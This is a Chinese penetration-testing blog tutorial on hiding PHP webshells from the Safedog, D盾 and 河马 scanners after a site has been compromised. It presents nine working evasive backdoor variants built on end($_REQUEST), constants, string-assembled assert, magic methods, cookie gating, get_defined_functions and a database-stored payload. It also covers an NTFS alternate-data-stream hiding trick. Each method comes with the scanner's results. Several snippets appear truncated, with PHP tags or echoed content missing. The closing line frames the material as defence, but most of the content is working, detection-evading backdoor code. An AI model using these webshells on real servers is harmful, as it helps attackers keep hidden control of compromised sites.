渗透测试基础 - bypass-绕过阻挡我们的WAF(下)

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)

    • 简介
    • 前期测试原理
    • 方法一 (end函数)
    • 方法二 (定义常量)
    • 方法三 (字符串拼接 + 双美元符)
    • 方法四 (强行分割)
    • 方法五 (魔术方法执行)
    • 方法六 (cookie传参加入条件)
    • 方法七 (get_defined_functions)
    • 方法八 (远程获取)
    • 方法九 (CMD藏文件之NTFS文件流)
    • 漏洞总结

只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力!

请进行合法的渗透测试,有关内容只是用作个人复习。

简介

上次介绍了如何绕过安全狗的测试语句检测,这次将介绍,在得到webshell权限后,如何让自己的木马文件不会被发现并删除。以webshell查杀来说,安全狗确实差了点意思,稍微对语句做一点变动,安全狗就不能有效的识别,所以这里会在多加入两个webshell检测工具,进行同步测试。【在正常的渗透测试中,是不需要做到让咱们的木马达到不被发现并删除的情况,所以我们这里还是以学习为主,当安全工具检测到恶意文件并无法确定是不是木马文件时,这就需要我们来进行评判了

三个webshell查杀工具下载地址:
【安全狗】:http://free.safedog.cn/website_safedog.html
【D盾】:http://www.d99net.net/News.asp?id=62
【河马】:https://www.shellpub.com

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第1张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第2张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第3张图片

前期测试原理

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第4张图片
在网站目录下留下一个较为常见的一句话木马文件,然后和网站安全狗配合测试。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第5张图片
安全狗一下就找到了它的存在,那这样是不行的,总不能刚刚放了一个文件进去就被发现了吧,那可太拉跨了,所以我们得对其进行一下测试,看看安全狗到底是因为什么而发现的它。

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第6张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第7张图片
在删除了$_REQUEST后面的中括号之后,发现安全狗好像没有认为其是木马文件了,所以这里是对中括号进行了拦截嘛?在测试一下前面的eval试试。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第8张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第9张图片

发现这样也是不拦截的,所以我们能不能采用替换的方法先试试呢?
eval是可以被assert所代替的,这个下面有例子能讲解。
那中括号呢有没有办法让其既不出现,但是这个文件又能达到木马的作用呢?

方法一 (end函数)

 eval(end($_REQUEST));?>

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第10张图片
根据了解知道 函数end()就是输出数组中最后一个值的,那这里的$_REQUEST刚刚好接收到的数据就是数组的形式。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第11张图片

 eval(end($_REQUEST));?>

所以这里end来获取$_REQUEST的值,然后再次给eval执行,既不用写刚刚的中括号,又让其能执行,这里来测试一下。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第12张图片
这里测试使用是没有问题的 拿到安全狗检测一下。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第13张图片
安全狗说自己没有发现,那这样就逃过了安全狗的检测。能过安全狗还不行,咱们再试试D盾和河马。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第14张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第15张图片

能看到河马也没有查出来,只有D盾能检测到。

方法二 (定义常量)

 define("a","$_REQUEST[a]");eval(a);?>

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第16张图片
定义常量 define常量的名字常量的值),a的值,就是$_REQUEST[a]接收到的值,然后在后面eval执行。

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第17张图片
执行没问题,三个软件检查一下。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第18张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第19张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第20张图片
安全狗(
河马(
D盾(检查到威胁4级【1-5级,5级紧急】

方法三 (字符串拼接 + 双美元符)


	$a = 'ass';
	$b = 'ert';
	$funcName = $a.$b;
	$x = 'funcName';
	$$x($_REQUEST[a]);
?>

这里就将eval替换为了assert,因为eval禁止拼接执行,所以这里只有assert才能这么玩

assert拆开了,分别赋值给 $a 和 $b ,然后下面将其拼接回来,并将assert字符串值赋值给了$funcName,然后$x = 字符串的funcName,下面是双美元符号,因为$x == funName$funcName == assert 所以最后的结果就是assert($_REQUEST[a])
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第21张图片

正常使用,还是用webshell工具查杀一下
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第22张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第23张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第24张图片
安全狗()【安全狗这小子,成绩一直很稳定】
河马(检测到威胁
D盾(检查到威胁3级相比于刚才降低了一级

方法四 (强行分割)


function a($a){
    return $a;
    }
    eval(a($_REQUEST)[a]);
?>

这里自定义一个叫a的函数,括号里面放入$a,下面是return 返回$a的值,这里就是,往$a里面传什么进去,就会返回什么回来。eval执行(函数a想要将$_REQUEST传入进去,然后返回回来一个$_REQUEST,然后就形成了eval($_REQUEST['a']))

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第25张图片
正常使用,webshell工具检测一下
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第26张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第27张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第28张图片
安全狗(
河马(
D盾(检查到威胁5级)【D盾这小子打小就聪明】

方法五 (魔术方法执行)


class User{
public $name = '';
function __destruct(){
	eval("$this->name");
	}
}
$user = new User;
$user->name = ''.$_REQUEST['a'];
?>
  1. 定义一个叫User的类
  2. 声明一个name公有变量 但是没有给其赋值
  3. 定义一个魔术方法,__destruct()的意思是当对象被销毁时执行【一定会执行的,因为一定会销毁】
    渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第29张图片
  4. 销毁时执行eval("$this->name");这里也是还没有跟name赋值
  5. User类实体化
  6. 将得到的值放入name中,然后放到上面的eval执行。
    渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第30张图片
    正常使用,webshell工具查杀一下

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第31张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第32张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第33张图片
安全狗(
河马(
D盾(检查到威胁5级)【该买谁 现在知道了吧】

方法六 (cookie传参加入条件)

 
	$cookie = $_COOKIE;
	foreach( $cookie as $key => $value)
	{
		if($key=='assert'){
			$key($_REQUEST['a']);
		}
	}
?>

先获取cookie值,将cookie的值放入$cookie中,因为cookie获取到的值是数组形式,所以这里用foreach进行结果遍历,将结果和值,分别放入$key$value 中【键值分离】。然后if条件判断,当cookie中键等于assert时,拿着$key去执行$_REQUEST传入过来值。

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第34张图片

cookie不传入assert 是不能正常执行的
继续测试查杀软件的成绩
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第35张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第36张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第37张图片

安全狗(
河马(检测到威胁
D盾(检查到威胁2级

方法七 (get_defined_functions)


$a = get_defined_functions();
$a[internal][841]($_REQUEST['a']);
?>

这里开局就遇到一个不认识的东西,我们看看是啥
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第38张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第39张图片
那前面的数字是什么意思呢,输出一下看看。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第40张图片
那这样就好理解了,get_defined_functions()将得到的数据全部放入$a中,然后用$a[internal][841]去检索里面的值,将assert给取出来,和后面的($_REQUEST['a'])相结合使用。【不得不说,想出这个的老哥还是秀的呀】
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第41张图片
查杀软件的成绩
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第42张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第43张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第44张图片
安全狗()【专业陪跑】
河马(
D盾(检查到威胁2级)【全靠友商衬托 哈哈】

方法八 (远程获取)

 
'''
eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('127.0.0.1','root','root','mysql_database','post'),'select * from jinx'))['info'])
'''
?>

这里有三个函数,一个个了解一下
mysqli_fetch_assoc:就是从结果里面取一行数据
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第45张图片

mysqli_query:这个一下连下面那个的意思也解释了,第一个做链接,第二个是查询
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第46张图片

mysqli_connect:链接数据库

那这样就好解释了
执行(取一行数据(查点数据(链接数据库,取出表jinx里面的所有数据))【查询的条件:info字段】)
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第47张图片
在配上这样一个图,就大功告成。
也测试一下。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第48张图片
webshell查杀一下。

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第49张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第50张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第51张图片
安全狗(检测出威胁)【ohhhhhhhhhh】
河马()【小丑竟是我自己】
D盾(检查到威胁5级)【基操勿6】

方法九 (CMD藏文件之NTFS文件流)

【网站目录下存放文件】
【网站目录下打开CMD】 echo "" >> /:123.txt

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第52张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第53张图片
执行完了之后好像什么都没有发生,但其实已经完成了。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第54张图片
最后再来看看测试结果。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第55张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第56张图片
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第57张图片
安全狗(
河马(
D盾(

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)_第58张图片

漏洞总结

本次介绍的这些方法都还算比较实用的,如果在现实中有遇到安全软件吃不准的情况下,个人就可以做一下判断,来确定是不是木马文件。

《最好的防御,是明白其怎么实施的攻击》

你可能感兴趣的:(安全,mysql)